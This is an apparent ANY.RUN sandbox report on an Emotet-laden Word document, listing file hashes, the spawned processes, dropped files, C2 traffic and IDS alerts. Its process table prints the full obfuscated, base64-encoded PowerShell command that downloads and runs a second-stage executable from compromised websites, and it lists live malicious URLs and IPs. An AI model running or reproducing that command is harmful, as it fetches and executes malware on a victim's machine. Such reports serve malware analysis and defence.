download: | agh2-9scajqi-bklorhk |
Full analysis: | https://app.any.run/tasks/9618bc44-3e0f-46fd-b498-fef909112bb8 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | April 23, 2019, 09:09:17 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Apr 23 09:33:00 2019, Last Saved Time/Date: Tue Apr 23 09:33:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 4, Security: 0 |
MD5: | 9C75040428344857E23387FBAD5FB642 |
SHA1: | 0AD3AED738FA8F181BB6714B9A5D0694E355B689 |
SHA256: | EFC112B0CC6F900702B85BD4B90ECFD44865F76710D3223D833FFC3A504F1FCD |
SSDEEP: | 6144:u77HUUUUUUUUUUUUUUUUUUUT52VRzS4IWBW0LoxkczdQwz/ft00:u77HUUUUUUUUUUUUUUUUUUUTCRzmW80i |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 4 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 4 |
Words: | - |
Pages: | 1 |
ModifyDate: | 2019:04:23 08:33:00 |
CreateDate: | 2019:04:23 08:33:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
636 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\agh2-9scajqi-bklorhk.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
1048 | powershell -e JAByAEEAMQAxAG8ARABVAD0AKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIALQBmACcAUgBYACcALAAnAFoAJwAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBCAEEAUQAnACwAJwBYACcAKQApADsAJABzADEAUQAxAFUAbwAgAD0AIAAnADIAMwAzACcAOwAkAEUAQQBBADQAQQB4AHcAPQAoACIAewAwAH0AewAxAH0AewAyAH0AIgAgAC0AZgAgACcARABRACcALAAnAFoAQQBYACcALAAnAFEAJwApADsAJABpAEEAXwBHAEEAawBrAGMAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAHMAMQBRADEAVQBvACsAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwB4AGUAJwAsACcALgBlACcAKQA7ACQAUwAxAG8AawBjAEQARwA9ACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiACAALQBmACAAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAFcAQQBBACcALAAnAFEAJwApACwAJwBEACcALAAnAEEAQQBEACcAKQA7ACQASwBaAEQAQQBYAEEAQgA9AC4AKAAnAG4AJwArACcAZQB3AC0AbwAnACsAJwBiAGoAZQBjAHQAJwApACAAbgBFAGAAVABgAC4AVwBlAEIAQwBMAGkAYABlAG4AdAA7ACQAegBRAF8AVQBBAEEAQwB3AD0AKAAiAHsANAB9AHsANgB9AHsAMwB9AHsAMgA4AH0AewAyADIAfQB7ADEANwB9AHsAMQAyAH0AewAyADUAfQB7ADEANAB9AHsAMgAzAH0AewA4AH0AewA5AH0AewA1AH0AewAxADUAfQB7ADIANAB9AHsAMQA4AH0AewAyADAAfQB7ADIANwB9AHsAMQAxAH0AewAwAH0AewAxAH0AewAyADEAfQB7ADEAOQB9AHsAMgA5AH0AewAyADYAfQB7ADEANgB9AHsAMQAwAH0AewAyAH0AewA3AH0AewAxADMAfQAiACAALQBmACAAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBtAGEAJwAsACcAdQBpACcAKQAsACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiACAALQBmACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBmACAAJwB3ACcALAAnAG0ALwAnACwAJwBwAC0AYQAnACkALAAnAG4AdAAuACcALAAnAGMAbwAnACkALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAGwALwB3ACcALAAnAG4AJwApACwAJwBwACcAKQAsACcAaQBuACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAHQAcAA6ACcALAAnAGgAdAAnACkALAAnAHAAJwAsACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADMAfQAiACAALQBmACAAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwAvAC8AJwAsACcAbQB1AGwAJwApACwAJwB0AGkAJwAsACcAdAAnACwAKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIALQBmACAAJwByACcALAAnAGEAJwAsACcAZABlAHAAbwAnACkAKQAsACcALQBhACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwAuACcALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAbgAuAG8AcgAnACwAJwBnACcAKQApACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwBuAGcALwAnACwAJwB3ACcAKQAsACcALgAnACwAKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIAIAAtAGYAJwAvAC8AZwAnACwAJwB0AHAAOgAnACwAJwBAAGgAdAAnACkALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAdAAnACwAJwB0AHAAOgAnACkALAAoACIAewAyAH0AewAwAH0AewAxAH0AIgAtAGYAKAAiAHsAMgB9AHsAMAB9AHsAMQB9ACIALQBmACcALwBsAFoAXwAnACwAJwBlADEAJwAsACcAbgAnACkALAAnAC8AJwAsACcAZABtAGkAJwApACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAG0AYQBzACcALAAnAC8AJwApACwAJwBwACcAKQAsACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiACAALQBmACAAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBvAG4AJwAsACcALQBjACcAKQAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACcAZQBuAHQAJwAsACcALwB1ACcAKQAsACcAdAAnACkALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAHMAbwBtACcALAAnAGUAJwApACwAJwBAAGgAJwAsACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACcAYwAnACwAJwBsAC4AaQAnACwAJwBlAGwAJwApACwAKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIAIAAtAGYAJwB0ACcALAAnADoALwAvACcALAAnAHQAcAAnACkALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwAvACcALAAnAHcAcAAtACcAKQAsACcAZAAnACkALAAoACIAewAzAH0AewAwAH0AewAyAH0AewAxAH0AewA0AH0AIgAtAGYAJwBpAG4AJwAsACcAXwB4ADgAJwAsACcALwBjACcALAAnAGQAbQAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwAvAEAAaAAnACwAJwB0ACcAKQApACwAKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIAIAAtAGYAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBuAHQAJwAsACcAYwBvAG4AdABlACcAKQAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAcQAvACcALAAnAF8AZwAnACkALAAnAC8ANgAnACkALAAnAGEAJwAsACgAIgB7ADAAfQB7ADIAfQB7ADEAfQB7ADMAfQAiAC0AZgAgACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcALwBAACcALAAnAF8AQQAnACkALAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAC8ALwAnACwAJwBmAHIAZQAnACkALAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAGgAdAB0AHAAJwAsACcAOgAnACkALAAnAGUAJwApACwAJwAvACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBkACcALAAnAGEAbABvAG4AaABhAG4AJwApACwAJwBzACcAKQAsACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiACAALQBmACcAXwBmACcALAAnAGkAbgBjACcALAAnAC8AJwAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBsAHUAZAAnACwAJwBlAHMALwBnACcAKQApACwAKAAiAHsAMAB9AHsAMwB9AHsAMQB9AHsAMgB9ACIALQBmACcAdAAuACcALAAnAHAAJwAsACcALQAnACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwBjAG8AJwAsACcAbQAvAHcAJwApACkALAAnAHIAaQBtACcAKQAuACIAUwBgAFAATABJAHQAIgAoACcAQAAnACkAOwAkAGQAQQBBADEAQQAxAFEAPQAoACIAewAxAH0AewAwAH0AIgAtAGYAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAEEAQQAnACwAJwAxAHcARAAnACkALAAnAEEAJwApACwAJwByAEEAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAZgBBAG8AQQBvAGMAVQAgAGkAbgAgACQAegBRAF8AVQBBAEEAQwB3ACkAewB0AHIAeQB7ACQASwBaAEQAQQBYAEEAQgAuACIARABPAFcATgBsAG8AQQBgAGQAZgBJAGAATABFACIAKAAkAGYAQQBvAEEAbwBjAFUALAAgACQAaQBBAF8ARwBBAGsAawBjACkAOwAkAEYAQQA0AEIAXwBCAEQAPQAoACIAewAwAH0AewAxAH0AewAyAH0AIgAgAC0AZgAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBrACcALAAnAFUAdwBEACcAKQAsACcANAAnACwAJwBDAHgAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAJwArACcAbQAnACkAIAAkAGkAQQBfAEcAQQBrAGsAYwApAC4AIgBMAGUATgBgAGcAdABIACIAIAAtAGcAZQAgADMAMgA5ADkAOQApACAAewAuACgAJwBJAG4AdgBvAGsAZQAtACcAKwAnAEkAdAAnACsAJwBlAG0AJwApACAAJABpAEEAXwBHAEEAawBrAGMAOwAkAE0AQgBBADQAYwBDAD0AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAEEAQQAnACwAJwBCAEcAQgAnACkALAAnAHQAJwApADsAYgByAGUAYQBrADsAJAB0AGMAYwBCAFUAQgAxAD0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9ACIAIAAtAGYAJwA0ACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAVQBEACcALAAnAFgAQQBaACcAKQAsACcAQQAnACkALAAnAHcAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABjAEcAawA0AEEAVQBfAHcAPQAoACIAewAxAH0AewAwAH0AIgAtAGYAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAGsAJwAsACcARABBAEcAJwApACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAWABrACcALAAnAEgAQgAnACkAKQA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WmiPrvSE.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3888 | "C:\Users\admin\233.exe" | C:\Users\admin\233.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
1252 | --640a0d70 | C:\Users\admin\233.exe | 233.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2172 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | 233.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2748 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | soundser.exe | |
User: admin Integrity Level: MEDIUM |
PID | Process | Filename | Type | |
---|---|---|---|---|
636 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR2E41.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1048 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Z5HCB2XFW0D45JTFBE56.temp | — | |
MD5:— | SHA256:— | |||
636 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:8240B3C907308BE5848DD9EAB129EB41 | SHA256:8CD319690223942809EED36D025A9FB894D6386299A95631BF13327BFD48E571 | |||
1048 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF | SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 | |||
636 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$h2-9scajqi-bklorhk.doc | pgc | |
MD5:90BAD04D3047CED29E6E811D6A8FFA0E | SHA256:DF44B14FEF8F32AE954BC84FEFEE6CE6525D1730FF597D77522385E6BABFE723 | |||
636 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:9AA328F831C50DD9BBEFE2D9BC2194AD | SHA256:965B6A8A909D7CFA9EB1790958BDCACB88B5258F8EB535D32891D882224E44E2 | |||
1252 | 233.exe | C:\Users\admin\AppData\Local\soundser\soundser.exe | executable | |
MD5:0AD37153765933B373E0A55D54BB635A | SHA256:B2BCB7FE83FFB8606BA25C652C5DFA2B2CF0DC694AF39285546D44910B39F208 | |||
1048 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1138d0.TMP | binary | |
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF | SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 | |||
1048 | powershell.exe | C:\Users\admin\233.exe | executable | |
MD5:0AD37153765933B373E0A55D54BB635A | SHA256:B2BCB7FE83FFB8606BA25C652C5DFA2B2CF0DC694AF39285546D44910B39F208 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2748 | soundser.exe | POST | — | 68.229.130.39:80 | http://68.229.130.39/jit/ | US | — | — | malicious |
2748 | soundser.exe | POST | — | 70.116.68.186:80 | http://70.116.68.186/chunk/entries/ringin/merge/ | US | — | — | malicious |
1048 | powershell.exe | GET | 200 | 149.255.62.85:80 | http://multitradepoint.com/wp-content/6_gq/ | GB | executable | 77.5 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2748 | soundser.exe | 70.116.68.186:80 | — | Time Warner Cable Internet LLC | US | malicious |
2748 | soundser.exe | 68.229.130.39:80 | — | Cox Communications Inc. | US | malicious |
1048 | powershell.exe | 149.255.62.85:80 | multitradepoint.com | Awareness Software Limited | GB | suspicious |
Domain | IP | Reputation |
---|---|---|
multitradepoint.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
1048 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
1048 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
1048 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2748 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |